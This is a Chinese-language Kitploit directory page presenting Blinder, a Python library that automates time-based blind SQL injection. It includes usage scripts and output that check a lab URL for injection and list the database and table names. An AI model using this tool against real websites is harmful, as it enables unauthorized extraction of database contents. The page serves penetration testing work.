Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blinder — 一个用于自动化基于时间盲注的Python库 | Kitploit
工具/GitHubGitHub/mhaskar/blinder
漏洞分析Web安全渗透测试数据库安全
GitHubmhaskar/blinder

Blinder

一个用于自动化基于时间盲注的Python库

查看仓库
50156年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Blinder

Blidner 是一个小型 Python 库,用于自动化基于时间的盲 SQL 注入,通过使用预定义的查询作为函数来快速开发 PoC。

安装

您可以通过以下命令安装 Blinder:

pip install blinder

或者下载源码并手动导入到您的项目中。

用法

要使用 Blinder,您需要导入 Blinder 模块,然后开始使用 Blinder 的主要函数。

您可以使用当前版本的 Blinder 执行以下操作:

  • 检查基于时间的注入。
  • 获取数据库名称。
  • 获取表名称。

您可以使用以下代码检查 URL 是否存在注入:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

执行结果如下:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

您可以使用以下代码获取数据库名称:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

结果如下:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

要获取表名称,您可以使用以下代码:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

结果如下:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

很多功能应该很快会添加,例如:

  • 添加自定义查询的能力
  • 基于 Burp 请求测试注入点
  • 提取表/列数据
下载工具